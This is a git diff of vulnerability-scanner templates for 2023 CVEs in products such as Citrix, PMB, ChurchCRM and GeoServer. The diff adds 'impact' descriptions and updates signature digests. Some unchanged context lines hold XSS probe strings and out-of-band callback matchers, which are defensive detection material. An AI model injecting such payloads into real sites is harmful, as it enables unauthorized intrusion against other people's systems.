diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml
index ee95d4f7f1..8c84e14da7 100644
--- a/http/cves/2023/CVE-2023-24488.yaml
+++ b/http/cves/2023/CVE-2023-24488.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 490a004630440220507f8eab9da59c4f0e2cd210585b35beb2d025daa4631f60a5a153abe0e3c5f4022018ef28d58be668460b51df3153616a97690e765c0ca435a6096cd1ffc4996691:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c366a2b687e2f1e9664b457e4395cbb5a85872d28b29d0aed027ff5414121b9d022100edefb520bdfcb32403ccf8d3d2f48bdb738f8241d325ac064d40fe2b27cb7bb3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml
index e0ccee11c3..b8f3fd768a 100644
--- a/http/cves/2023/CVE-2023-24489.yaml
+++ b/http/cves/2023/CVE-2023-24489.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: dsl
         dsl:
           - 'BaseURL+ "/cifs/" + fileName + ".aspx"'
-# digest: 4a0a004730450220704d4143372ca7e05b98584882af72fd97e7738ad5fba4f87a2ac882d56be0dc022100d7649f1d8fbca3196af2c32966c10eb3e59e794f5b1d3586e87115c92de77dcf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022029464c72132615b765a1cd1d7b5f95bfbb1e42afabb075aaef5752fcfe1bd0df02210088ae65a40850e3f9994991fdeaf12c05ddbc708d1814f73e5f6c0d7d3140cd35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml
index 53ab0b5c0b..e41072b1b4 100644
--- a/http/cves/2023/CVE-2023-24657.yaml
+++ b/http/cves/2023/CVE-2023-24657.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of phpIPAM or apply the necessary security patches provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "Subnet masks")'
         condition: and
-# digest: 4b0a00483046022100df0cc4ea6fd8f2fc27c30b299bc0f3ba2c6e5823db138d8456ce220039e18d2a022100fe00434c5c7518f99b044ce25c7e7d970e53d1b2b1c09e09cf65dbd7e6e39b03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022010e04aaa11a8633b38ce99b869b3bff3127f3a8289d5be5bf7e3002873a3383102202d036c6969801d8cef1bb439c28eaa6a036725501b855097a420fdace3d8b65b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml
index a9d0bf35c6..bfa447611e 100644
--- a/http/cves/2023/CVE-2023-24733.yaml
+++ b/http/cves/2023/CVE-2023-24733.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of PMB.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008bc035cb019f3ca5d778959803fe422344a811203f000aace61d23fb2ce06e09022059d0495e740d599c79aec2255584cc08096b42b8ace670c428576329a98a4f38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c5906123dbddad7c8cbc0a6eaf342b20e295cdaa179e6dc0da7aba7b1f6994e0022005877848a96b54ad2aa3ad3d2030793389665481eb60a918e5c7749b20c88288:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml
index 0d57550033..63f5bf60af 100644
--- a/http/cves/2023/CVE-2023-24735.yaml
+++ b/http/cves/2023/CVE-2023-24735.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Upgrade PMB to a version that has addressed the open redirect vulnerability (CVE-2023-24735).
   reference:
@@ -38,4 +40,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$'
-# digest: 4b0a004830460221009501d5a08754f6d80b9ab53de70276b5e79ad80dac995b0a98ffcdf910b2fe19022100abbfe9923693031d04bcb5c7f263846a7a7d60f7ab383601f4fb525304785db3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202a96e3fefdea654313725f34b848ba9c631b4d104d4d26d4f7a21315d49363f402207061a81420f5b85ef9ebde5cc72a8f2e267a7df33d7e7241ed346653bd5abdef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml
index ee570e0972..2bd95581a3 100644
--- a/http/cves/2023/CVE-2023-24737.yaml
+++ b/http/cves/2023/CVE-2023-24737.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of PMB.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c52200ef401728332822c7fec9c94e6688adc897d170cfd67da32ea5ae7f11a80220647486bbda18b361f2a0aca842e086dff9f63dfa9b4cbc1817f061811d3a1a64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bdad0c783b14c38279572634fd575157e1bcd6e5d7b7bc6b31dbc93a92e68757022100c960b26089a04aabdf17cb4b0286791afac4dbf77ff831ecd64cf3228b0a50fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index f205d8c85c..4257e61a4c 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a3c1eddbc71d88b2f5220e192dde6a76148d81496ead666bba8e715440269b0f022100c5a035a01d65005194bf189c5556be8f7affcab2d80ae967a81c36fb46d91561:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206d64dffd694d182b44bdaa3d1823e3108b85c59eeb6232418120b0102d6f11c9022100ab0289ed488aa5876d2f52a3afbd12a94adfc87aaca5b1ed523eb91983521dde:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml
index 370ce945eb..de3402e0ef 100644
--- a/http/cves/2023/CVE-2023-25157.yaml
+++ b/http/cves/2023/CVE-2023-25157.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest security patches or updates provided by the GeoServer project to fix the SQL Injection vulnerability.
   reference:
@@ -74,4 +76,4 @@ http:
           - 'FID,([aA-zZ_]+),'
         internal: true
         part: body_2
-# digest: 4a0a00473045022100bb0c65f06258d365dfe352c12a28f8c83039f5047f686193c715cc59581e4e2f02202cb2e869093597e3c078456321e91a2c6fe3dea3a2b54d62fe0c0fcc5cc1fdf2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa99fb8c7f3d2459e1e76d438654d24682e5e84023db5f3912f37f465e1455de02210093139fac0eb4b9c505e404dce9085324d89eeedad6705f72baee722edbdcdd0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml
index 1bda788d04..48bf4834ca 100644
--- a/http/cves/2023/CVE-2023-25346.yaml
+++ b/http/cves/2023/CVE-2023-25346.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "ChurchCRM")'
         condition: and
-# digest: 4a0a00473045022100eb17f20f80b9b6a5ebb0a92060551afd0d4299af0da636096383ca7576543c6302206ce59c583b4689e8b65062d55870e1160f5200bb8ce78104018527f386403b50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202a4e07774b4ec133ed0ae84ebacadbeb07a899035e9c09ffaf71b02f6b5933c90221008107207587c1117e161cb55c38d2851d56211656878a83d715765c6b9c6f04da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml
index e045efec63..284dc9b86c 100644
--- a/http/cves/2023/CVE-2023-25573.yaml
+++ b/http/cves/2023/CVE-2023-25573.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data.
   remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability.
   reference:
     - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ff860644c2682b733371d32503bbf62e7f289acea051a8a5e6e0bc670c9fa2e40221008adeb8c8fd4cf15a1fdd01526747d1c1c658a69e74b7554dbaf3c9096ddcd430:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207b3ed3501b8744163f4187763d01c233d73030a9e3a1eec8477e3259c1f73f83022100ed8856678028780fbc2067c6c6df0bd2ae2039f73cfafdcdeee33755009e159f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml
index 7062a72e90..8aa940f414 100644
--- a/http/cves/2023/CVE-2023-25717.yaml
+++ b/http/cves/2023/CVE-2023-25717.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
+  impact: |
+    Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - contains_all(to_lower(interactsh_request), 'user-agent','curl')
           - status_code_1 == 302
         condition: and
-# digest: 4a0a0047304502203ce40a64452fedbe6ff1c6f398144012eb27c32a5366d3fecbc2c216d3896512022100943ed0494fde4db2958f9fde8583e0c3ea470c7ed09eb2a22ab3ff996eb04fbc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c8e1d7b21e6898b83a49fd2e968057291cf791f6e411daf2b7349086981a394702210083f14148bc705c9ce626348effac715c591e98bcbedb1520578633498404ab9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml
index b7ff685285..eace4b6bcc 100644
--- a/http/cves/2023/CVE-2023-26067.yaml
+++ b/http/cves/2023/CVE-2023-26067.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
   remediation: |
     Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
           - contains(body, 'Fax Trace Settings')
           - status_code == 200
         condition: and
-# digest: 4a0a0047304502207d76d5ef37ac8a6ff97f713ef7ea8a8aae8988bd7ed0518db38eaf4eb1a308b8022100facbb6ebae8314a2bd1f641b510ab71c25f14cc3fe0784bcec74425ddfba67b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220163561843a7b5f8754625b9cd1bef0361406c1e90c2fc3c6101aee87ba80a26802210086e62dc10055052f8ab06f627820eff37f4f82d339c5316fbf6f935d4511f538:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml
index 5e65aeeb95..d96563d514 100644
--- a/http/cves/2023/CVE-2023-26255.yaml
+++ b/http/cves/2023/CVE-2023-26255.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009aba5a88193456d3adf537fbfdda0e1f3f65a6646be6de79e60112178af682dc0221008aa3b8de1a664dd0a8d3c94544dcab4bea5f32464a93f988b82e734b3046b0fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100aafaf6a56bc4cc741b009e0e90e841d567e1d433b6750838102dd649f6a5559d022100c95041147139461a758d472ced9a045971d5445ffe29b567bc44f02cf22b6b5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml
index 2dbf9d97b1..278a6da92f 100644
--- a/http/cves/2023/CVE-2023-26256.yaml
+++ b/http/cves/2023/CVE-2023-26256.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server.
   remediation: |
     Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008b0a811cb52aa79199fdc82118e0e39140502c09fb676d563359b36749eebb2f022030fa92ca248026593a47f012c23cf3c0f940f0eab30fa5af18a0d6aacef63aa7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205f26f5f2a623dfb539048669fa449a522fa9d012f69f016cad978db6e0ab1585022100a4925133a39384dcf55b8c97aaca1b7a6c6951c34e40a941d27befa09d245b7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml
index f0fd5a99d3..1ef6ebe5d0 100644
--- a/http/cves/2023/CVE-2023-26360.yaml
+++ b/http/cves/2023/CVE-2023-26360.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
   remediation: |
     Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4b0a00483046022100c0362243042e5515f037203a0e6f7bff1333d80323cd048c6dca536b47fe80dc02210094e632a4238a97e0bf58ea8864894bdd6aa6f253950e0bf1fa4a09faf5a25454:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220682fee6a34a2111d3e99f1c70928256183a601e388f06c9b10772787c3f99cb3022100b81b24fe3bf754c1396014a9acda00828795c0c753cae1bdea0e01b6b9c05c03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index 847fe64e23..eef6ebd3c1 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade Jorani to a patched version or apply the necessary security patches.
   reference:
@@ -71,4 +73,4 @@ http:
         name: csrf
         regex:
           - 'name="csrf_test_jorani" value="(.*?)"'
-# digest: 4a0a00473045022014d435a7bdaea8942bc01eb10ad9b8372eeeb311d6fc5505c9222327cc35074d022100de8592cb521c2a119c6ab295e2f97ca6d59a32f90bee2ec60576f13497f255c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210092163fa6649bb117f88bbdf10436d2478a894fe85c56d36ee4113970bd74474202210085583f475ab3ef0008f4c784bc9d43c92ab1ceb5c0078861fc66cc2eda71062e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml
index 56097cb844..26b011502b 100644
--- a/http/cves/2023/CVE-2023-2648.yaml
+++ b/http/cves/2023/CVE-2023-2648.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of Weaver E-Office.
   reference:
@@ -69,4 +71,4 @@ http:
         regex:
           - "([0-9]+)"
         internal: true
-# digest: 4a0a00473045022100e38731840b3cf0fdcbfadc36d47bc7657bfeab0bc74c0eb392397ec6e489f44b02203fb1f7c3f12e586803b62edf8505bcb5c4a0dfbf4a37eb46ba275d3fda449ac9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d9631e3b4ed89b6aa9be1270b611bbe394a707c3eca1ff5cf877ce8219386fdd022062fe72cb7e856a8e132530d93f1ecaa19b30dcfc61ef5e6c72bdfe9a29fa535e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml
index 69a12f33fb..fb4a68e1f9 100644
--- a/http/cves/2023/CVE-2023-26842.yaml
+++ b/http/cves/2023/CVE-2023-26842.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a00473045022100bc001314a3380f96e3ee4b6f0109162c34816e0e42b5607d3a15f5d89eed6dcf0220048fc5e9f385e96546c2be94e97ea9ab9f4c355bd134c8dc3ee91f972a2ad993:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022075665ebb713bc5cecf4a6f72c668410e9327d0da517dfb25e4142997bef201d8022053f2ad2b48514e8ed05cc31aa1c7bf49d0ff5ea39dac76c030c60a1eabbebec0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml
index 680cbc3680..e02b7e4b53 100644
--- a/http/cves/2023/CVE-2023-26843.yaml
+++ b/http/cves/2023/CVE-2023-26843.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(body_2, "><img src=x onerror=alert(document.domain)>")'
           - 'contains(body_2, "ChurchCRM")'
         condition: and
-# digest: 4a0a0047304502210098f1ff93cc631efd3345e3f81b8842618f421c6ac3b606df6eac327a0049070302205e8abc1c7c95b8c4b049b35f6b2bf0fb2fc1d4f0e6454a26a4bdf57b0501c575:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100da81855e534da680f5367c9e313d21eccb7b84457eaaebe5964643d28376e68b02203918a6b72c7c052c7228272de84d7ea262b0a59f1be4371c91cc12f921cd2a91:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml
index 7e5218aabd..4ddb72d9f8 100644
--- a/http/cves/2023/CVE-2023-27008.yaml
+++ b/http/cves/2023/CVE-2023-27008.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ATutor < 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade ATutor to version 2.2.2 or above to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201206475121918e43bae5f4155011d83dae863b2b5d3c407e4cfe3dc0d6c0265b02210087d04c0f2d8f082f0ded2d9a6e28d9c85071e114f2a11f59e646f51907760164:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ec1003dbb5d4ef1a14bbb425562e3890993288eaebcf4cb5be10f4543fd47b15022021039b0a559cbf2cae2901f1b0de6f1eb0a5fa9c27129cb28ded96263f72d696:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml
index 8a24e7f511..58bee7b5cd 100644
--- a/http/cves/2023/CVE-2023-27034.yaml
+++ b/http/cves/2023/CVE-2023-27034.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and its underlying infrastructure.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -77,4 +79,4 @@ http:
           - 'duration_1>=6'
           - 'contains(body_2, "Jms Blog")'
         condition: and
-# digest: 4b0a0048304602210083665e909799a18e308b2df22b848ac58b3083bdb127f70bf4c4548209f697c8022100f1cf9ec8bd60d6bfaeb726c65f52cb44c5abcc1a004a3dbd649bbca2e5016c04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220176789a72a89678a946bef9ffe8e30388b775dda085923687815ae5652061375022100bd9d5ea019d724f5722551cc367bb1a078719872e537b7c6b304778ad0f83c56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml
index b78e4d3b48..495a9f6b56 100644
--- a/http/cves/2023/CVE-2023-27159.yaml
+++ b/http/cves/2023/CVE-2023-27159.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the server.
   remediation: |
     Upgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: Appwrite-Server"
-# digest: 4a0a004730450220015576b6251dd36c3a200c3da1d1c11451ce7d7bba444bfa11a3762e9b3d776d022100e0045076d93bd7fe0eb47f4f9392f7aead89533fd58d1e46f13f304c7316b692:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
